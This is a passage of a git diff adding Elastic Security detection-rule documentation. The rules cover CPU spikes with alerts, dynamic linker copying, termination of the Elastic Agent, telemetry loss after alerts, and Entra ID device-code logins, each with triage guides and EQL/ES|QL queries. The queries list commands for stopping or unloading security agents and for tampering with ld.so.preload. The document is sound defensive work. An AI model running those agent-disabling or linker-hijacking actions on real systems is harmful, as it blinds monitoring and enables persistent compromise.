ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ +* Technique: +** Name: Proxy +** ID: T1090 +** Reference URL: https://attack.mitre.org/techniques/T1090/ +* Sub-technique: +** Name: External Proxy +** ID: T1090.002 +** Reference URL: https://attack.mitre.org/techniques/T1090/002/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Sub-technique: +** Name: Exfiltration to Code Repository +** ID: T1567.001 +** Reference URL: https://attack.mitre.org/techniques/T1567/001/ +* Sub-technique: +** Name: Exfiltration to Cloud Storage +** ID: T1567.002 +** Reference URL: https://attack.mitre.org/techniques/T1567/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc new file mode 100644 index 0000000000..f4dbe3f900 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc @@ -0,0 +1,174 @@ +[[prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike]] +=== Detection Alert on a Process Exhibiting CPU Spike + +This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Use Case: Threat Detection +* Rule Type: Higher-Order Rule +* Resources: Investigation Guide +* Domain: Endpoint +* Tactic: Impact + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Detection Alert on a Process Exhibiting CPU Spike* + + +This rule identifies processes that both triggered a security alert and exhibited unusually high CPU utilization on the +same host and process ID within a short time window. This combination may indicate malicious execution, resource abuse, or +post-compromise activity. + + +*Possible investigation steps* + +- Review the correlated alert(s) to understand why the process was flagged by Elastic Defend. +- Examine the process name, command line, and SHA-256 hash to determine whether the process is expected or known to be malicious. +- Validate the observed CPU usage and duration to determine whether the spike is abnormal for this process and host. +- Check for related process activity such as parent/child processes, suspicious process spawning, or privilege escalation attempts. +- Review additional host telemetry including: + - Network connections initiated by the process + - File creation or modification events + - Persistence mechanisms (services, scheduled tasks, registry keys) +- Determine whether similar activity is observed on other hosts, which may indicate a broader compromise. + + +*False positive analysis* + +- Legitimate high-CPU processes such as software updates, backup agents, security scans, or system maintenance tasks. +- Resource-intensive but benign applications (e.g., compilers, video encoding, data processing jobs). +- Security tools or monitoring agents temporarily consuming high CPU. + + +*Response and remediation* + +- If malicious activity is confirmed, isolate the affected host to prevent further impact. +- Terminate the offending process if safe to do so. +- Remove any identified malicious binaries or artifacts and eliminate persistence mechanisms. +- Apply relevant patches or configuration changes to remediate the root cause. +- Monitor the environment for recurrence of similar high-CPU processes combined with security alerts. +- Escalate the incident if multiple hosts or indicators suggest coordinated or widespread activity. + +==== Setup + + + +*Setup* + + +This rule requires host CPU metrics collected via the Elastic Agent **System** integration. + + +*System Metrics Integration Setup* + +The System integration collects host-level metrics such as CPU usage, load, memory, and process statistics and sends them to Elasticsearch using Elastic Agent. + + +*Prerequisite Requirements:* + +- Elastic Agent managed by Fleet +- A Fleet Server configured and reachable + Refer to the Fleet Server setup guide: + https://www.elastic.co/guide/en/fleet/current/fleet-server.html + + +*The following steps should be executed in order to enable CPU metrics collection:* + +- Go to the Kibana home page and click **Add integrations**. +- In the search bar, enter **System** and select the **System** integration. +- Click **Add System**. +- Configure an integration name and optionally add a description. +- Under **Metrics**, ensure the following datasets are enabled: + - `system.cpu` + - `system.load` (optional but recommended) + - `system.process` (optional, if process-level CPU is required) +- Review optional and advanced settings as needed. +- Add the integration to an existing agent policy or create a new agent policy. +- Deploy the Elastic Agent to the hosts from which CPU metrics should be collected. +- Click **Save and Continue** to finalize the setup. + + +*Validation* + +After deployment, verify CPU metrics ingestion by confirming the presence of documents in: +- `metrics-system.cpu-*` +- `metrics-system.load-*` (if enabled) + +For more details on the System integration and available metrics, refer to the documentation: +https://docs.elastic.co/integrations/system + + +==== Rule query + + +[source, js] +---------------------------------- +FROM metrics-*, .alerts-security.* METADATA _index +| where not KQL("""kibana.alert.rule.tags : "Rule Type: Higher-Order Rule" """) +| eval + // processes with more than 70% total CPU use + cpu_metrics_pids = CASE(_index like ".ds-metrics-system.process-*" and system.process.cpu.total.norm.pct >= 0.7, process.pid, null), + // any security alert with process.name and ID populated excluding low severity ones + alerts_pids = CASE(_index like ".internal.alerts-security.*" and kibana.alert.rule.name is not null and process.name is not null and process.pid is not null and host.id is not null and kibana.alert.risk_score > 21, process.pid, null) +| stats pid_with_cpu_spike = COUNT_DISTINCT(cpu_metrics_pids), pid_with_alerts = COUNT_DISTINCT(alerts_pids), + Esql.max_cpu_pct = MAX(system.process.cpu.total.norm.pct), + Esql.alerts = VALUES(kibana.alert.rule.name), + Esql.process_hash_sha256 = VALUES(process.hash.sha256), + process_path = VALUES(process.executable), + parent_process_path = VALUES(process.parent.executable), + user_name = VALUES(user.name), + host_name = VALUES(host.name), + cmdline = VALUES(process.command_line) by process.pid, process.name, host.id +| where pid_with_cpu_spike > 0 and pid_with_alerts > 0 +// populate fields to use in rule exceptions +| eval process.hash.sha256 = MV_FIRST(Esql.process_hash_sha256), + process.executable = MV_FIRST(process_path), + process.parent.executable = MV_FIRST(parent_process_path), + process.command_line = MV_FIRST(cmdline), + user.name = MV_FIRST(user_name), + host.name = MV_FIRST(host_name) +| KEEP user.name, host.id, host.name, process.*, Esql.* +| where `process.executable` != "C:\\Program Files\\ESET\\ESET Security\\ekrn.exe" and + `process.executable` != "C:\\Windows\\System32\\CompatTelRunner.exe" and + `process.executable` != "C:\\Program Files\\UiPath\\Studio\\UiPath.ActivityCompiler.CommandLine.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc new file mode 100644 index 0000000000..4f390b81fb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc @@ -0,0 +1,197 @@ +[[prebuilt-rule-8-19-18-dynamic-linker-copy]] +=== Dynamic Linker Copy + +Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Orbit +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 215 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Dynamic Linker Copy* + + +The Linux dynamic linker is responsible for loading shared libraries required by executables at runtime. It is a critical component of the Linux operating system and should not be tampered with. + +Adversaries may attempt to copy the dynamic linker binary and create a backup copy before patching it to inject and preload malicious shared object files. This technique has been observed in recent Linux malware attacks and is considered highly suspicious or malicious. + +The detection rule 'Dynamic Linker Copy' is designed to identify such abuse by monitoring for processes with names "cp" or "rsync" that involve copying the dynamic linker binary ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2") and modifying the "/etc/ld.so.preload" file. Additionally, the rule checks for the creation of new files with the "so" extension on Linux systems. By detecting these activities within a short time span (1 minute), the rule aims to alert security analysts to potential malicious behavior. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + + +*Possible investigation steps* + + +- Investigate the dynamic linker that was copied or altered. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE ( path = '/etc/ld.so.preload' OR path = '/lib64/ld-linux-x86-64.so.2' OR path =\n'/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path = '/usr/lib64/ld-linux-x86-64.so.2' OR path =\n'/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\n"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path = '/etc/ld.so.preload' OR path =\n'/lib64/ld-linux-x86-64.so.2' OR path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR path =\n'/usr/lib64/ld-linux-x86-64.so.2' OR path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' )\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. +- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes. + - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration. + - !{osquery{"label":"Osquery - Retrieve Listening Ports","query":"SELECT pid, address, port, socket, protocol, path FROM listening_ports"}} + - !{osquery{"label":"Osquery - Retrieve Open Sockets","query":"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets"}} + - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} + + +*False positive analysis* + + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. +- Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. +- The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + + +*Related Rules* + + +- Modification of Dynamic Linker Preload Shared Object Inside A Container - 342f834b-21a6-41bf-878c-87d116eba3ee +- Modification of Dynamic Linker Preload Shared Object - 717f82c2-7741-4f9b-85b8-d06aeb853f4f +- Shared Object Created or Changed by Previously Unknown Process - aebaa51f-2a91-4f6a-850b-b601db2293f4 + + +*Response and Remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where host.os.type == "linux" and event.type == "start" and process.name in ("cp", "rsync", "mv") and + process.args in ( + "/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload", "/lib64/ld-linux-x86-64.so.2", + "/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/usr/lib64/ld-linux-x86-64.so.2" + ) and + not process.args like ("/var/tmp/mkinitramfs*", "/var/tmp/dracut*", "/tmp/mkinitcpio*")] +[file where host.os.type == "linux" and event.action == "creation" and (file.extension == "so" or file.name like "*.so.*")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc new file mode 100644 index 0000000000..71b1ce4455 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc @@ -0,0 +1,155 @@ +[[prebuilt-rule-8-19-18-elastic-agent-service-terminated]] +=== Elastic Agent Service Terminated + +Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Elastic Agent Service Terminated* + + +The Elastic Agent is a crucial component for monitoring and securing endpoints across various operating systems. It ensures continuous security oversight by collecting and analyzing data. Adversaries may attempt to disable this agent to evade detection, compromising system defenses. The detection rule identifies suspicious termination activities by monitoring specific processes and commands across Windows, Linux, and macOS, flagging potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the event logs to identify the exact process and command used to terminate the Elastic Agent, focusing on the process names and arguments such as "net.exe", "sc.exe", "systemctl", and "pkill" with arguments like "stop", "uninstall", or "disable". +- Check the timeline of events around the termination to identify any preceding suspicious activities or anomalies that might indicate an adversary's presence or actions. +- Investigate the user account associated with the process termination to determine if it was authorized or if there are signs of account compromise. +- Examine the host for any other signs of tampering or compromise, such as unauthorized changes to system configurations or the presence of other malicious processes. +- Verify the current status of the Elastic Agent on the affected host and attempt to restart it if it is not running, ensuring that security monitoring is restored. +- Correlate this event with other alerts or logs from the same host or network to identify potential patterns or coordinated attack activities. + + +*False positive analysis* + + +- Routine maintenance activities may trigger the rule if administrators use commands like systemctl or service to stop the Elastic Agent for updates or configuration changes. To manage this, create exceptions for known maintenance windows or authorized personnel. +- Automated scripts or deployment tools that temporarily disable the Elastic Agent during software installations or updates can cause false positives. Identify these scripts and whitelist their execution paths or specific arguments. +- Testing environments where Elastic Agent is frequently started and stopped for development purposes might generate alerts. Exclude these environments by specifying their hostnames or IP addresses in the rule exceptions. +- Security tools or processes that interact with the Elastic Agent, such as backup solutions or system monitoring tools, might inadvertently stop the service. Review these interactions and adjust the rule to ignore specific process names or arguments associated with these tools. +- User-initiated actions, such as troubleshooting or system performance optimization, may involve stopping the Elastic Agent. Educate users on the impact of these actions and establish a protocol for notifying the security team when such actions are necessary. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network to prevent further unauthorized access or potential lateral movement by adversaries. +- Verify the status of the Elastic Agent on the affected host and attempt to restart the service. If the service fails to restart, investigate potential causes such as corrupted files or missing dependencies. +- Conduct a thorough review of recent process execution logs on the affected host to identify any unauthorized or suspicious activities that may have led to the termination of the Elastic Agent. +- If malicious activity is confirmed, perform a comprehensive malware scan and remove any identified threats. Ensure that the host is clean before reconnecting it to the network. +- Review and update endpoint security configurations to prevent unauthorized termination of security services. This may include implementing stricter access controls or using application whitelisting. +- Escalate the incident to the security operations team for further analysis and to determine if additional hosts are affected or if there is a broader security incident underway. +- Document the incident, including all actions taken and findings, to enhance future response efforts and update incident response plans as necessary. + +==== Setup + + + +*Setup* + + +If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, +events will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2. +Hence for this rule to work effectively, users will need to add a custom ingest pipeline to populate +`event.ingested` to @timestamp. +For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and +( + /* net, sc or wmic stopping or deleting Elastic Agent on Windows */ + ( + process.name : ("net.exe", "sc.exe", "wmic.exe","powershell.exe","taskkill.exe","PsKill.exe","ProcessHacker.exe") and + process.args : ("stopservice","uninstall", "stop", "disabled","Stop-Process","terminate","suspend") and + process.args : ("elasticendpoint", "Elastic Agent","elastic-agent","elastic-endpoint") + ) or + + /* service or systemctl used to stop Elastic Agent on Linux */ + ( + process.name in ("systemctl", "service", "chkconfig", "update-rc.d") and + process.args : ("elastic-agent", "elastic-agent.service", "ElasticEndpoint") and + process.args : ("stop", "disable", "remove", "off", "kill", "mask") and + not ( + process.parent.executable : "/opt/Elastic/Agent/data/elastic-agent-*/components/previous/elastic-endpoint" and + process.parent.args : "uninstall" and + process.parent.args : "--keepstate" + ) + ) or + + /* pkill, killall used to stop Elastic Agent or Endpoint on Linux */ + (process.name in ("pkill", "killall", "kill") and process.args : ("elastic-agent", "elastic-endpoint")) or + + /* Unload Elastic Defend extension on MacOS */ + (process.name : "kextunload" and process.args : "com.apple.iokit.EndpointSecurity") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc new file mode 100644 index 0000000000..7570bef3dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss]] +=== Elastic Defend Alert Followed by Telemetry Loss + +Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1562/001/ + +*Tags*: + +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Rule Type: Higher-Order Rule +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Elastic Defend Alert Followed by Telemetry Loss* + + +This rule identifies situations where an Elastic Defend alert is generated on a host and is not followed by +any normal endpoint activity events within a short time window. This may indicate agent tampering, sensor +disablement, host shutdown, system crash, or defense evasion behavior. + + +*Possible investigation steps* + + +- Review the original `endpoint.alert` event and identify the detection that triggered the alert. +- Check the host’s online status, uptime, and reboot history. +- Verify the health and status of the Elastic Defend agent and related services. +- Look for evidence of agent tampering, service stops, or security control modifications. +- Correlate with activity immediately preceding the alert for signs of exploitation or evasion. +- Determine if similar alert → silence patterns are occurring on other hosts. + + +*False positive analysis* + + +- Legitimate system reboots or shutdowns +- Network connectivity loss +- Elastic Agent upgrades or restarts +- Endpoint service crashes +- Maintenance or IT operations + + +*Response and remediation* + + +- Validate host and agent availability. +- Reconnect or re-enroll the agent if telemetry is missing. +- Isolate the host if malicious activity is suspected. +- Investigate for security control tampering. +- Perform broader environment hunting for similar patterns. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5m + [any where event.dataset == "endpoint.alerts"] + ![any where event.category in ("process", "library", "registry", "network", "dns", "file")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: User Execution +** ID: T1204 +** Reference URL: https://attack.mitre.org/techniques/T1204/ +* Sub-technique: +** Name: Malicious File +** ID: T1204.002 +** Reference URL: https://attack.mitre.org/techniques/T1204/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc new file mode 100644 index 0000000000..6b28ca1553 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc @@ -0,0 +1,163 @@ +[[prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user]] +=== Entra ID OAuth Device Code Grant by Unusual User + +Identifies when a user is observed for the first time authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. This rule only applies to Entra ID user types and detects new users leveraging this flow. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://aadinternals.com/post/phishing/ +* https://www.blackhillsinfosec.com/dynamic-device-code-phishing/ +* https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ +* https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows +* https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 8 + +*Rule authors*: + +* Elastic +* Matteo Potito Giorgio + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID OAuth Device Code Grant by Unusual User* + + +This rule detects the first instance of a user authenticating via the DeviceCode authentication protocol within the historical window. The DeviceCode authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access. + + +*Possible investigation steps* + + +- Review `azure.signinlogs.properties.user_principal_name` and `azure.signinlogs.properties.user_id` to identify the user involved. +- Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`. +- Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is expected. +- Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted location. +- Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious. +- Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider. +- Review `azure.signinlogs.properties.applied_conditional_access_policies` and `azure.signinlogs.properties.conditional_access_status` to determine if MFA or conditional access policies were enforced or bypassed. +- Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied. +- Review `azure.signinlogs.properties.device_detail.browser` and `user_agent.original` to determine if the login aligns with expected device behavior. +- Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client. +- Check if the user recently reported phishing attempts or suspicious emails. +- Look for recent changes in the user’s account settings, including password resets, role changes, or delegation of access. +- Review if other users in the environment have triggered similar DeviceCode authentication events within the same timeframe. + + +*False positive analysis* + + +- If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected. +- Some legitimate applications or scripts may leverage the DeviceCode authentication protocol for non-interactive logins. +- In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts. +- If the user is traveling or accessing from a new location, confirm legitimacy before taking action. + + +*Response and remediation* + + +- Immediately revoke any access tokens associated with this authentication event. +- Review additional authentication logs, application access, and recent permission changes for signs of compromise. +- Reset the affected user’s credentials and enforce stricter MFA policies for sensitive accounts. +- Restrict DeviceCode authentication to only required applications. +- Enable additional 